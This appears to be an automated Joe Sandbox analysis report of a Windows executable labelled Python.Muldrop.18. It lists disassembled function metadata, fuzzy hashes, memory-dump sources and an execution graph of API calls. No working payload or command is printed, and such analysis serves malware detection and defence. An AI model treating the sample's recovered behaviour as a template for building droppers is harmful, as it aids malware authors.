                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                            • Instruction ID: 7ecdee88e30bd90edaae6cdabe63325c28458c945aabb9600368f7b1b716c72e
                                                            • Opcode Fuzzy Hash: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                            • Instruction Fuzzy Hash: C6618333908BC581D7609B19E4813AAF7A0FBA6B98F444225EB9C53B59CFBCD191CB10
                                                            Function 00007FF7B10FF9A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3896166516-3733052814
                                                            • Opcode ID: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                            • Instruction ID: dd981827b9e1467a569c2025a812086018e45c678bf5b39bb8baeaefac9c150d
                                                            • Opcode Fuzzy Hash: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                            • Instruction Fuzzy Hash: 2A51C43390824686EB64AF199086268B790FBA6B8CF944135DB8C47BDDCFBCE854C710
                                                            Function 00007FF7B10F2870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 1878133881-2410924014
                                                            • Opcode ID: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                            • Instruction ID: 4ad632826b433992ec58cb73cc5a008d732bcb472dc55e755a6746d88febd390
                                                            • Opcode Fuzzy Hash: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                            • Instruction Fuzzy Hash: D231617262868681E720EB14F4916DAE364FF95B88FC04036E78D47A9DDF7CD605CB50
                                                            Function 00007FF7B10F3EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F3EE1
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastMessageModuleName
                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                            • API String ID: 2581892565-1977442011
                                                            • Opcode ID: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                            • Instruction ID: dce7dd1568ff17bc687f7b07ef8b35a4957087429372f0a6b304b2797560665a
                                                            • Opcode Fuzzy Hash: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                            • Instruction Fuzzy Hash: AB011251B1D64784FB60B718E4963B5D351AF6A7C8FC10431DA4D8629EEE9CE215C620
                                                            Function 00007FF7B110D140 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                            • String ID:
                                                            • API String ID: 2718003287-0
                                                            • Opcode ID: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                            • Instruction ID: f5941ae5bc44774b4a537be55753450097c92f399b5480db914d635055d14729
                                                            • Opcode Fuzzy Hash: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                            • Instruction Fuzzy Hash: 53D10E72F08A8589EB10DF69E4442ACB7B5EB2679CB944235CF4DD7B89DE78D406C310
                                                            Function 00007FF7B1105E34 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                            • String ID:
                                                            • API String ID: 2780335769-0
                                                            • Opcode ID: c83329a2bd18a21367976a5c4af3d00e11dcc87eb128c326a6acb0b8d0e7847d
                                                            • Instruction ID: e2423e65366464eced4db86ad83e28aa75bedf55f581b19cc54c1b063289bedb
                                                            • Opcode Fuzzy Hash: c83329a2bd18a21367976a5c4af3d00e11dcc87eb128c326a6acb0b8d0e7847d
                                                            • Instruction Fuzzy Hash: E9517D22E046458AFB50EF69E4443BDB3A1EB6AB5CFA04139DB0D46689DFBCD4418721
                                                            Function 00007FF7B10F2310 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$DialogInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1956198572-0
                                                            • Opcode ID: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                            • Instruction ID: 0023772962e75975d6a6ad446ed24b2e7f597928afb234dd3ef8c866ffa1a545
                                                            • Opcode Fuzzy Hash: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                            • Instruction Fuzzy Hash: F0112961A1C14242F744AB6EF5853BDD351EFA6B84FC98030EB4806B9DCDBCD5C14210
                                                            Function 00007FF7B111686C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                            • String ID: ?
                                                            • API String ID: 1286766494-1684325040
                                                            • Opcode ID: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                            • Instruction ID: 2b5a1b5e534ef5501de0d7ce3aae900a66add7fbdb9d20e3e4d401811230c0cb
                                                            • Opcode Fuzzy Hash: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                            • Instruction Fuzzy Hash: 7B413A12A0838E46F760AB29B4013BAD751EBA27ACF914235EF5C06ADDEEFDD451C710
                                                            Function 00007FF7B1109B84 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1109BB6
                                                              • Part of subcall function 00007FF7B110B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                              • Part of subcall function 00007FF7B110B4EC: GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7B10FC125), ref: 00007FF7B1109BD4
                                                            Strings
                                                            • C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, xrefs: 00007FF7B1109BC2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                            • API String ID: 2553983749-2061591972
                                                            • Opcode ID: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                            • Instruction ID: 16294694b15b5211dfde6b961f113b65f26557b9842c1492e5796eb6c2b8e8b0
                                                            • Opcode Fuzzy Hash: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                            • Instruction Fuzzy Hash: D041C336E08B4A85EB14FF29B4940B8A395EF567D8BA54035EB0E43B4DDEBCD4818320
                                                            Function 00007FF7B110D7D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: U
                                                            • API String ID: 442123175-4171548499
                                                            • Opcode ID: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                            • Instruction ID: 1267abbeb22d34578140706e89224bcee9dfad3d948cc879710998fe45632c49
                                                            • Opcode Fuzzy Hash: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                            • Instruction Fuzzy Hash: A741D222A18A4981DB20AF29F8443A9B761FBA9788F914135EF4DC778CEF7CD541C750
                                                            Function 00007FF7B110FEF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            • Opcode ID: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                            • Instruction ID: 360914d15e2a1ce6765cc70c5ff4610b51b8ba25de5fcbf15d44f5e875ee9542
                                                            • Opcode Fuzzy Hash: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                            • Instruction Fuzzy Hash: 1121EE23E0864A82EB20AB19E44966DF3B1FB96B4CFD18035D74D43289DFBCD545C7A1
                                                            Function 00007FF7B10F2B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Fatal error detected
                                                            • API String ID: 1878133881-4025702859
                                                            • Opcode ID: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                            • Instruction ID: e19756eafa73aa0b9cccd69f3eabd86b6dbc94a9955b3dd9b859ea21f9dc805c
                                                            • Opcode Fuzzy Hash: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                            • Instruction Fuzzy Hash: DC21B47262868681EB20EB19F4916EAE364FFA5788FC00135E74D47A5DDF7CD215CB10
                                                            Function 00007FF7B10F2C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Error detected
                                                            • API String ID: 1878133881-3513342764
                                                            • Opcode ID: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
                                                            • Instruction ID: a89100743298aa394df7a0bc1ee220fbe075d417e044e5c59ac706c83a0238ca
                                                            • Opcode Fuzzy Hash: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
                                                            • Instruction Fuzzy Hash: DB21D67262868681EB20EB14F4916EAE364FFA5788FC01136E74D4799DDF7CD215CB10
                                                            Function 00007FF7B1100468 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFileHeaderRaise
                                                            • String ID: csm
                                                            • API String ID: 2573137834-1018135373
                                                            • Opcode ID: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                            • Instruction ID: 1e5a5edb6d15036ba1751cb96005690155786f1d7dc9949cb6edb74bea5f2680
                                                            • Opcode Fuzzy Hash: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                            • Instruction Fuzzy Hash: 9E118E32A18B4482EB619B29F404269B7E4FB99B88F994230EBCC47B59DF7CC4518700
                                                            Function 00007FF7B11109FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                            • String ID: :
                                                            • API String ID: 2595371189-336475711
                                                            • Opcode ID: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                            • Instruction ID: e658934f62d2653758f10665b3c08920d8104fafff134d2b7aedc2079bd43052
                                                            • Opcode Fuzzy Hash: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                            • Instruction Fuzzy Hash: 1401B512D1C20B85EB20BF58B46227EE390EF6670CFC10135D74D46649DFBCE510CA24

                                                            Execution Graph

                                                            Execution Coverage:4.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:278
                                                            Total number of Limit Nodes:13
                                                            execution_graph 9923 7ff8e7514098 9924 7ff8e75140bf 9923->9924 9926 7ff8e75140d2 9923->9926 9927 7ff8e75140e8 9924->9927 9928 7ff8e751413b 9927->9928 9929 7ff8e7514103 9927->9929 9940 7ff8e7512f84 9928->9940 9929->9928 9931 7ff8e751410d 9929->9931 9936 7ff8e7514b50 9931->9936 9933 7ff8e7514117 9934 7ff8e7512f84 00007FF8E73C6B10 9933->9934 9935 7ff8e751411c 9933->9935 9934->9935 9935->9926 9937 7ff8e7514b5e 9936->9937 9938 7ff8e7514bd8 9937->9938 9939 7ff8e7514bc2 00007FF8E73C6B10 9937->9939 9938->9933 9939->9938 9942 7ff8e7512f9b 9940->9942 9941 7ff8e7513008 9941->9933 9942->9941 9943 7ff8e7512ff2 00007FF8E73C6B10 9942->9943 9943->9941 10000 7ff8e755375c 10001 7ff8e755377f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10000->10001 10002 7ff8e75537f3 10000->10002 10001->10002 10083 7ff8e751739c 10086 7ff8e75173c0 10083->10086 10084 7ff8e75173fc 10086->10084 10087 7ff8e751745c 00007FF8E76ACD40 10086->10087 10089 7ff8e751748c 10087->10089 10090 7ff8e75174c8 10087->10090 10088 7ff8e7517900 4 API calls 10088->10089 10089->10088 10089->10090 10090->10084 10003 7ff8e7517b60 10004 7ff8e7517b7c 10003->10004 10005 7ff8e7517da0 3 API calls 10004->10005 10008 7ff8e7517bce 10004->10008 10006 7ff8e7517bb5 10005->10006 10006->10008 10009 7ff8e75181a0 10006->10009 10010 7ff8e751e468 10009->10010 10011 7ff8e75181b3 00007FF8E73C6B10 10010->10011 10012 7ff8e75181ca 10011->10012 10012->10008 10013 7ff8e7511360 10014 7ff8e7511387 10013->10014 10016 7ff8e75113b8 10013->10016 10015 7ff8e75151a0 11 API calls 10014->10015 10014->10016 10015->10016 10017 7ff8e751b360 10018 7ff8e751b37c 10017->10018 10019 7ff8e751b381 10017->10019 10021 7ff8e751b51c 10018->10021 10022 7ff8e751b53f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10021->10022 10023 7ff8e751b5b3 10021->10023 10022->10023 10023->10019 9868 7ff8e7517864 9869 7ff8e7517870 00007FF8E76ACD40 9868->9869 9871 7ff8e75178c9 9869->9871 9872 7ff8e751788d 9869->9872 9872->9871 9873 7ff8e7517900 9872->9873 9874 7ff8e7517920 9873->9874 9878 7ff8e75179c3 9873->9878 9874->9878 9879 7ff8e7517da0 9874->9879 9876 7ff8e7517997 9877 7ff8e75179ac 00007FF8E73C6B10 9876->9877 9876->9878 9877->9878 9878->9872 9882 7ff8e7517dca 9879->9882 9880 7ff8e751b020 3 API calls 9881 7ff8e7517ef3 9880->9881 9881->9876 9882->9880 10057 7ff8e7512be4 10058 7ff8e7512bf0 10057->10058 10060 7ff8e7512bfd 10057->10060 10059 7ff8e7514b50 00007FF8E73C6B10 10058->10059 10058->10060 10059->10060 10028 7ff8e754fb28 00007FF8E7637A5C 10029 7ff8e754fb47 10028->10029 9836 7ff8e75166f0 9838 7ff8e751670f 9836->9838 9837 7ff8e7516828 00007FF906026A30 9839 7ff8e7516846 00007FF906026A30 9837->9839 9840 7ff8e75168a0 9837->9840 9838->9837 9838->9840 9839->9840 9841 7ff8e7516864 00007FF906026A30 9839->9841 9841->9840 9842 7ff8e7516882 00007FF906026A30 9841->9842 9842->9840 9903 7ff8e7513af0 9904 7ff8e7513b28 9903->9904 9905 7ff8e751c5cd 9904->9905 9906 7ff8e751b020 3 API calls 9904->9906 9907 7ff8e7513be8 9906->9907 9944 7ff8e7513eb0 9945 7ff8e7513ecd 9944->9945 9946 7ff8e751c688 9944->9946 9945->9946 9949 7ff8e7513f08 9945->9949 9948 7ff8e7513efd 9954 7ff8e7514ac0 9949->9954 9951 7ff8e7513f24 9952 7ff8e75151a0 11 API calls 9951->9952 9953 7ff8e7513f3f 9951->9953 9952->9953 